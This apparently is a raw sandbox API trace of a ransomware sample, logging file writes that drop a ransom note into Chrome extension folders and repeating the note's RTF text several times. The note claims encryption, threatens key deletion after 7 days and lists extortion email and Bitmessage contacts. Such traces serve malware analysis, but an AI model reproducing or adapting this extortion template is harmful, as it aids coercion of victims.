w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.337] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.337] CloseHandle (hObject=0x294) returned 1 [0285.338] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0285.338] GetLastError () returned 0x2 [0285.338] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.338] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 